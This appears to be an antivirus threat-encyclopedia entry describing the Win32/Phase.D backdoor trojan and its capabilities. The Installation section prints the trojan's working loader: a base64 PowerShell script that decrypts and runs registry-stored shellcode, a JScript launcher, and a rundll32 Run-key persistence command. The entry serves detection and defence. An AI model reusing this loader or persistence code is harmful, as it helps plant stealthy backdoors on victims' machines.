Win32/Phase [Threat Name] go to Threat

Win32/Phase.D [Threat Variant Name]

Category trojan
Size 262722 B
Detection created Dec 31, 2014
Detection database version 10949
Aliases VirTool:Win32/CeeInject.gen!KK (Microsoft)
  Variant.Symmi.49542 (BitDefender)
Short description

The trojan serves as a backdoor. It can be controlled remotely.

Installation

The trojan may create the following files:

  • %startup%\­%variable%.exe

A string with variable content is used instead of %variable% .


This causes the trojan to be executed on every system start.


The trojan may set the following Registry entries:

  • [HKEY_CURRENT_USER\­Software\­Microsoft\­Active Setup\­Installed Components\­{72507C54-3577-4830-815B-310007F6135A}]
    • "Rc4Encoded32" = %encryptedpayload_x86% (54989 B)
    • "Rc4Encoded64" = %encryptedpayload_x64% (54989 B)
    • "Javascript" = "sPowerShellScript = "IyBSZWFkIEFuZCBFeGVjdXRlIFJjNCBFbmNyeXB0ZWQgU2hlbGxDb2RlIEZyb20gVGhlIFJlZ2lzdHJ5IA0KDQojIFNldCBSZWdpc3RyeSBLZXkNCiRzUmVnaXN0cnlLZXkgPSAnSEtDVTpcU29mdHdhcmVcTWljcm9zb2Z0XEFjdGl2ZSBTZXR1cFxJbnN0YWxsZWQgQ29tcG9uZW50c1x7NzI1MDdDNTQtMzU3Ny00ODMwLTgxNUItMzEwMDA3RjYxMzVBfSc7DQoNCiMgU2V0IEtleSBGb3IgS2V5IFN0cmVhbQ0KW0J5dGVbXV0kYktleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldEJ5dGVzKCJQaGFzZSIpOw0KDQojIEltcG9ydCBOYXRpdmUgRnVuY3Rpb25zDQokc0NvZGUgPSBAIg0KW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildDQpwdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlVGhyZWFkKEludFB0ciBscFRocmVhZEF0dHJpYnV0ZXMsIHVpbnQgZHdTdGFja1NpemUsIEJ5dGVbXSBscFN0YXJ0QWRkcmVzcywgSW50UHRyIGxwUGFyYW1ldGVyLCB1aW50IGR3Q3JlYXRpb25GbGFncywgSW50UHRyIGxwVGhyZWFkSWQpOw0KW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildDQpwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFZpcnR1YWxQcm90ZWN0KEJ5dGVbXSBscEFkZHJlc3MsIHVpbnQgZHdTaXplLCB1aW50IGZsTmV3UHJvdGVjdCwgW091dF0gSW50UHRyIGxwZmxPbGRQcm90ZWN0KTsNCltEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXQ0KcHVibGljIHN0YXRpYyBleHRlcm4gdWludCBXYWl0Rm9yU2luZ2xlT2JqZWN0KEludFB0ciBoSGFuZGxlLCBpbnQgZHdNaWxsaXNlY29uZHMpOw0KIkANCg0KIyBNYWtlIFRoZSBDb2RlIFJlY29nbml6ZWQgQnkgUG93ZXJTaGVsbA0KJHBGdW5jdGlvbnMgPSBBZGQtVHlwZSAtbWVtYmVyRGVmaW5pdGlvbiAkc0NvZGUgLU5hbWUgIldpbjMyIiAtbmFtZXNwYWNlIFdpbjMyRnVuY3Rpb25zIC1wYXNzdGhydQ0KDQojIERlY2xhcmUgU2hlbGxjb2RlIEFycmF5DQpbQnl0ZVtdXSRiU2hlbGxDb2RlOw0KDQojIENoZWNrIFBvaW50ZXIgU2l6ZSBUbyBDaGVjayBJZiB4NjQNCmlmIChbSW50UHRyXTo6U2l6ZSAtZXEgOCkgew0KCSMgTG9hZCBFbmNyeXB0ZWQgeDY0IFNoZWxsY29kZSBGcm9tIFJlZ2lzdHJ5DQoJJGJTaGVsbENvZGUgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAkc1JlZ2lzdHJ5S2V5IC1OYW1lIFJjNEVuY29kZWQ2NCkuUmM0RW5jb2RlZDY0Ow0KfWVsc2V7DQoJIyBMb2FkIEVuY3J5cHRlZCB4ODYgU2hlbGxjb2RlIEZyb20gUmVnaXN0cnkNCgkkYlNoZWxsQ29kZSA9IChHZXQtSXRlbVByb3BlcnR5IC1QYXRoICRzUmVnaXN0cnlLZXkgLU5hbWUgUmM0RW5jb2RlZDMyKS5SYzRFbmNvZGVkMzI7DQp9DQoNCiMgRGVmaW5lIEJ5dGUgQXJyYXlzIFRoYXQgQXJlIFRoZSBCb3hlcw0KW0J5dGVbXV0kcyA9IE5ldy1PYmplY3QgQnl0ZVtdIDI1NjsNCltCeXRlW11dJGsgPSBOZXctT2JqZWN0IEJ5dGVbXSAyNTY7DQoNCiMgTG9vcCBmcm9tIDAgdG8gMjU1IHRvIGZpbGwgdGhlIGJveGVzDQpmb3IgKCRpID0gMDsgJGkgLWx0IDI1NjsgJGkrKyl7DQoJIyBGaWxsIEJveCBTIFdpdGggMC0yNTUNCgkkc1skaV0gPSBbQnl0ZV0kaTsNCgkNCgkjIEZpbGwgQm94IEsgV2l0aCAoMC0yNTUpL2R3S2V5TGVuDQoJJGtbJGldID0gJGJLZXlbJGkgJSAkYktleS5MZW5ndGhdOw0KfQ0KDQojIEluaXRpYWxpemUgag0KJGogPSAwOw0KDQojIExvb3AgVGhyb3VnaCBBbGwgMjU2IEJ5dGVzDQpmb3IgKCRpID0gMDsgJGkgLWx0IDI1NjsgJGkrKyl7DQoJJGogPSAoJGogKyAkc1skaV0gKyAka1skaV0pICUgMjU2Ow0KCQ0KCSMgSG9sZCBUZW1wb3JhcnkgVmFsdWUgT2YgU1tpXSBGb3IgU3dhcHBpbmcNCgkkYlN3YXAgPSAkc1skaV07DQoJDQoJIyBTZXQgU1tpXSBXaXRoIFNbal0NCgkkc1skaV0gPSAkc1skal07DQoJDQoJIyBTZXQgU1tqXSBXaXRoIE9sZCBWYWx1ZSBPZiBTW2ldDQoJJHNbJGpdID0gJGJTd2FwOw0KfQ0KDQojIEluaXRpYWxpemUgaQ0KJGkgPSAwOw0KDQojIEluaXRpYWxpemUgag0KJGogPSAwOw0KDQojIExvb3AgVGhyb3VnaCBUaGUgQnl0ZXMgSW4gVGhlIEJ1ZmZlcg0KZm9yICgkeCA9IDA7ICR4IC1sdCAkYlNoZWxsQ29kZS5MZW5ndGg7ICR4Kyspew0KCSMgUHNldWRvLVJhbmRvbSBHZW5lcmF0aW9uIEFsZ29yaXRobQ0KCSRpID0gKCRpICsgMSkgJSAyNTY7DQoJJGogPSAoJGogKyAkc1skaV0pICUgMjU2Ow0KCQ0KCSMgSG9sZCBUZW1wb3JhcnkgVmFsdWUgT2YgU1tpXSBGb3IgU3dhcHBpbmcNCgkkYlN3YXAgPSAkc1skaV07DQoJDQoJIyBTZXQgU1tpXSBXaXRoIFNbal0NCgkkc1skaV0gPSAkc1skal07DQoJDQoJIyBTZXQgU1tqXSBXaXRoIE9sZCBWYWx1ZSBPZiBTW2ldDQoJJHNbJGpdID0gJGJTd2FwOw0KCVtpbnRdJHQgPSAoJHNbJGldICsgJHNbJGpdKSAlIDI1NjsNCgkNCgkjIFhvciBQbGFpblRleHQgV2l0aCBLZXlTdHJlYW0NCgkkYlNoZWxsQ29kZVskeF0gPSAkYlNoZWxsQ29kZVskeF0gLWJ4b3IgJHNbJHRdOw0KfQ0KDQojIENoZWNrIFdoYXQgU2l6ZSBXZSBTaG91bGQgQWxsb2NhdGUNCiRkd1NpemUgPSAkYlNoZWxsQ29kZS5MZW5ndGg7DQoNCiMgQ2hlY2sgU2l6ZSBPZiBTaGVsbENvZGUNCmlmICgkZHdTaXplIC1ndCAweDAwMDAwMDAwKXsNCgkjIFZhcmlhYmxlIFRvIEhvbGQgT2xkIFByb3RlY3Rpb24gRmxhZ3MNCglbSW50W11dJGR3T2xkUHJvdCA9IDB4MDAwMDAwMDA7DQoNCgkjIEdldCBQb2ludGVyIFRvICRkd09sZFByb3QNCgkkcGR3T2xkUHJvdCA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlVuc2FmZUFkZHJPZlBpbm5lZEFycmF5RWxlbWVudCgkZHdPbGRQcm90LDApDQoNCgkjIFNldCBSZWFkL1dyaXRlL0V4ZWN1dGUgRmxhZ3MgT24gU2hlbGxDb2RlDQoJaWYgKCRwRnVuY3Rpb25zOjpWaXJ0dWFsUHJvdGVjdCgkYlNoZWxsQ29kZSwgJGR3U2l6ZSwgMHg0MCwgJHBkd09sZFByb3QpKXsJCQ0KCQkjIENyZWF0ZSBBIE5ldyBUaHJlYWQgVG8gRXhlY3V0ZSBPdXIgU2hlbGxDb2RlDQoJCSRoVGhyZWFkID0gJHBGdW5jdGlvbnM6OkNyZWF0ZVRocmVhZCgwLCAwLCAkYlNoZWxsQ29kZSwgMCwgMCwgMCk7DQoJCQ0KCQkjIFdhaXQgRm9yIE91ciBUaHJlYWQNCgkJJHBGdW5jdGlvbnM6OldhaXRGb3JTaW5nbGVPYmplY3QoJGhUaHJlYWQsIC0xKTsNCgl9DQp9DQogICAgICAgDQo="; oWSShell = new ActiveXObject("WScript.Shell"); sWindows = oWSShell.ExpandEnvironmentStrings("%windir%"); sPowerShell = sWindows + "\­\­system32\­\­windowspowershell\­\­v1.0\­\­powershell.exe"; oFile = new ActiveXObject("Scripting.FileSystemObject"); if (oFile.FileExists(sPowerShell)){ (oWSShell.Environment("Process"))("LoadShellCodeScript") = "iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('" + sPowerShellScript + "')))"; oWSShell.Run(sPowerShell + " iex $env:LoadShellCodeScript", 0, 1);}"
  • [HKEY_CURRENT_USER\­Software\­Microsoft\­Windows\­CurrentVersion\­Run]
    • "Windows Host Process (RunDll)" = "rundll32.exe javascript:"\­..\­mshtml,RunHTMLApplication ";eval((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\­\­Software\­\­Microsoft\­\­Active%20Setup\­\­Installed%20Components\­\­{72507C54-3577-4830-815B-310007F6135A}\­\­JavaScript"));close();"

This causes the trojan to be executed on every system start.


The trojan creates and runs a new thread with its own program code within the following processes:

  • explorer.exe

The trojan creates and runs a new thread with its own program code in all running processes.


The trojan deletes the original file.

Information stealing

The trojan collects the following information:

  • operating system version
  • information about the operating system and system settings
  • FTP account information
  • URLs visited

The trojan is able to log keystrokes.


The trojan collects sensitive information when the user browses certain web sites.


The trojan attempts to send gathered information to a remote machine.

Other information

The trojan acquires data and commands from a remote computer or the Internet.


The trojan contains a URL address. The HTTP protocol is used.


It can execute the following operations:

  • download files from a remote computer and/or the Internet
  • run executable files
  • monitor network traffic
  • set up a proxy server
  • update itself to a newer version
  • uninstall itself
  • capture screenshots
  • simulate user's input (clicks, taps)
  • create Registry entries
  • perform DoS/DDoS attacks
  • open a specific URL address

The trojan contains the program code of the following malware:

  • Win32/ServStart.AD

The trojan hides its presence in the system.


The trojan hooks the following Windows APIs:

  • HttpSendRequestW (wininet.dll)
  • PR_Write (nss3.dll)
  • send (ws2_32.dll)
  • TranslateMessage (kernel32.dll)
  • ZwCreateFile (ntdll.dll)
  • ZwQueryDirectoryFile (ntdll.dll)
  • ZwReadVirtualMemory (ntdll.dll)
  • ZwResumeThread (ntdll.dll)

The trojan keeps various information in the following Registry key:

  • [HKEY_CURRENT_USER\­Software\­Microsoft\­Active Setup\­Installed Components\­{72507C54-3577-4830-815B-310007F6135A}\­Communicate]

The trojan contains both 32-bit and 64-bit program components.

Please enable Javascript to ensure correct displaying of this content and refresh this page.